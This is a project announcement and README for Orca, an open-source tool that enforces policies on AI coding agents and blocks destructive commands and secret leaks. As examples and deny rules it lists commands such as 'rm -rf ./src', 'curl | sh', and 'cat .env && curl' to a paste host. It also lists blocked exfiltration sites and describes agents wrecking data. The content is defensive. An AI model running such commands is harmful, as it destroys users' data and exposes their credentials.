Show HN: Stop Destructive Agent Commands Before They Happen

Christopher Karani released Orca, an open-source safety layer that intercepts and enforces policies on autonomous AI agents before they execute destructive commands like file deletion or secret leaks. The tool sits between agents and machines, allowing developers to define rules that block or require approval for risky actions across multiple agent frameworks.

The safety layer for autonomous AI agents running on real machines. Orca lets you give AI agents more autonomy without letting them delete data, leak secrets, modify protected files, or perform irreversible actions without approval. AI agents are no longer just chatbots. They run shell commands, edit files, call APIs, access credentials, use tools, browse the web, and operate on laptops, servers, CI pipelines, and spare machines. That is powerful. It is also dangerous. Orca sits between the agent and the machine, enforcing your policies before risky actions execute. Install brew tap christopherkarani/orca brew install --formula orca Initialize a policy orca init --preset generic-agent Run an agent with guardrails orca run -- claude orca run -- codex orca run -- hermes orca run -- openclaw orca run -- opencode This project is free and open source under Apache 2.0. If Orca is useful to you, please star the repository — it helps visibility and keeps development going. Developers and teams are starting to give autonomous agents real access: - local files - source code .env files- SSH keys - shell commands - cloud CLIs - databases - browsers - CI pipelines - internal tools - long-running workflows Today, the safety model is usually one of these: - babysit every command - run the agent in Docker or a VM - write custom scripts and ignore files - trust the agent not to do something destructive That does not scale. Orca gives you a reusable policy layer across agents. Write the rules once. Apply them everywhere. Orca focuses on the actions that can ruin your day: git push --force git reset --hard rm -rf sudo curl | sh terraform destroy kubectl delete DROP TABLE aws delete- gcloud delete touching ~/.ssh reading .env leaking API keys modifying protected config sending data to unknown hosts Orca can allow, deny, ask for approval, or log these actions depending on your policy. You give an agent a task: Clean this up and make it work. The agent decides to run: rm -rf ./src or: git reset --hard or: cat .env && curl https://paste.example.com You find out after the damage is done. The agent tries the same action. Orca intercepts it first. Action blocked Command: rm -rf ./src Reason: Destructive recursive delete inside project directory. Policy: deny destructive file deletion Result: Command was not executed. For actions that might be valid but risky, Orca can ask first: Approval required Command: git push origin main Reason: Pushing to a protected branch requires human approval. Approve? y/N Orca is not another AI agent. Orca is the policy enforcement layer underneath the agents you already use. You ↓ Orca policy layer ↓ Hermes / Claude Code / Codex / OpenClaw / OpenCode / Cursor ↓ Shell / files / network / tools / cloud / databases The agent can still do useful work. It just cannot silently cross the boundaries you define. | Agent | Usage | |---|---| | Claude Code | orca run -- claude | | Codex CLI | orca run -- codex | | Hermes | orca run -- hermes | | OpenClaw | orca run -- openclaw | | OpenCode | orca run -- opencode | | Cursor / custom agents | use Orca as a wrapper or policy hook | One policy file can protect multiple agents. brew tap christopherkarani/orca brew install --formula orca Or use the install script: curl -fsSL https://raw.githubusercontent.com/christopherkarani/Orca/main/scripts/install.sh | sh Verify your setup: orca doctor orca init --preset generic-agent This creates: .orca/policy.yaml Example policy: mode: ask commands: default: ask allow: - "git status" - "git diff " - "npm test" - "zig build " deny: - "rm -rf " - "sudo " - "curl | sh" - "git reset --hard " - "terraform destroy " - "kubectl delete " approval: - "git push " - "git push --force " - "aws delete " - "gcloud delete " files: read: deny: - "./.env" - "~/.ssh/ " - " / secret " - " / token " write: approval: - "./config/ " - "./.github/ " - "./infra/ " network: default: ask deny: - "pastebin.com" - "paste.rs" - "webhook.site" allow: - "github.com" - "api.github.com" orca run -- claude orca run -- codex orca run -- hermes orca run -- openclaw In interactive mode, Orca can ask before risky actions. In CI mode, Orca fails closed: orca run --ci -- codex --prompt "Refactor auth" No prompts. Risky actions are blocked automatically. Run a safe local demo: orca demo blocked-action Then inspect what happened: orca replay --session last --only denied --verify No AI agent required. No files are harmed. Start the local dashboard: orca dashboard Open: http://127.0.0.1:7742 The dashboard shows: - current policy status - recent sessions - prevented actions - approval decisions - replay verification - audit integrity Everything runs locally. No cloud service is required. Let Claude Code, Codex, or Hermes work longer without babysitting every command. orca run -- claude Use Orca to ask before risky actions and block destructive ones. Run Hermes on a spare Mac mini, MacBook, VPS, or workstation with clearer boundaries. Protect: - important folders - SSH keys .env files- config files - cloud credentials - local databases - browser-accessible workflows - destructive shell commands orca run -- hermes Commit Orca policy to your repo: .orca/policy.yaml Now every developer and agent runs under the same safety rules. No more one-off scripts per person. Run autonomous agents in CI without interactive approval. orca run --ci -- codex --prompt "Update the migration scripts" In CI, Orca converts ask into deny . If the agent tries something dangerous, the job fails safely. Test your policy against known attack fixtures: orca redteam --ci Use this to make sure new policies do not accidentally weaken your guardrails. Orca is designed to be honest about what it does and does not protect. - launches agents inside a policy-controlled process - evaluates shell commands before execution - mediates file access based on policy - filters sensitive environment variables - detects secret access and exfiltration attempts - enforces network rules - records tamper-evident audit logs - supports replayable sessions - fails closed in CI mode Orca is not a perfect kernel sandbox. It does not protect agents that are not launched through Orca. It does not replace Docker, VMs, OS permissions, VPNs, SSH hardening, or least-privilege infrastructure. Use those too. Orca is the behavior-level policy layer on top. Docker controls the environment. Orca controls what the agent is allowed to do inside that environment. | Mode | Behavior | |---|---| observe | log decisions with minimal blocking | ask | ask before risky actions | strict | block aggressively | ci | never prompt, deny risky actions | Example: mode: ask For automation: orca run --ci -- hermes After each session, Orca stores a local audit trail. Review denied actions: orca replay --session last --only denied Verify integrity: orca replay --session last --verify Export JSON: orca replay --session last --json Session artifacts live under: .orca/sessions/ Audit logs are tamper-evident using chained hashes. Orca can block or redact access to sensitive files and values. Examples: .env ~/.ssh/id rsa ~/.ssh/id ed25519 AWS ACCESS KEY ID GITHUB TOKEN ANTHROPIC API KEY OPENAI API KEY Google service account JSON JWTs private keys high-entropy tokens Run with secretless mode: orca run --secretless -- claude In secretless mode, Orca replaces raw values with broker references before the agent sees them. The agent gets a reference. Not the secret. Orca can run as a wrapper around agents, which is the strongest protection model. Some agents also support native plugins or hooks for deeper integration. orca plugin install hermes --yes hermes plugins enable orca orca plugin doctor hermes openclaw plugins install npm:orca-openclaw-plugin --dangerously-force-unsafe-install OpenClaw requires the override because the plugin calls the local orca binary for policy enforcement. Docker is useful. You should use it where it makes sense. But Docker and Orca solve different problems. Docker controls what the process can access. Orca controls what the AI agent is allowed to do. An agent inside Docker can still: - delete mounted project files - read secrets mounted into the container - push code - run destructive migrations - call cloud CLIs - modify config - exfiltrate data over allowed network paths Orca adds behavior-level policy, approvals, and auditability on top of your existing isolation. Many developers already do. They write: - ignore files - command filters - approval scripts - read-only config hacks - custom wrappers - shell aliases - one-off security prompts That works until every agent, repo, machine, and teammate needs a different version. Orca turns those guardrails into a reusable policy layer. Near-term focus: - stronger default policy packs - Hermes-specific protections - cloud delete protections - database delete protections - protected config policies - approval workflows - team policy sharing - CI enforcement - better replay reports Longer-term: - centralized team dashboard - organization-wide policy management - SSO/RBAC - policy marketplace - enterprise audit exports - agent security sprints Install /christopherkarani/Orca/blob/main/docs/install.md Quickstart /christopherkarani/Orca/blob/main/docs/quickstart.md Policy reference /christopherkarani/Orca/blob/main/docs/policy.md Credentials /christopherkarani/Orca/blob/main/docs/credentials.md Replay /christopherkarani/Orca/blob/main/docs/replay.md Commands /christopherkarani/Orca/blob/main/docs/commands.md Plugin security model /christopherkarani/Orca/blob/main/docs/integrations/plugin-security-model.md Plugin troubleshooting /christopherkarani/Orca/blob/main/docs/integrations/plugin-troubleshooting.md zig build zig build test ./zig-out/bin/orca --help ./zig-out/bin/orca redteam --ci Orca is early, open source, and actively evolving. Current focus: - stop irreversible agent actions - protect secrets and sensitive files - provide shared policy across agents - give users replayable evidence of what happened - make autonomous agents safer without making them useless Feedback, issues, PRs, and roasts are welcome. If Orca helps you, please leave a star. It genuinely motivates continued work.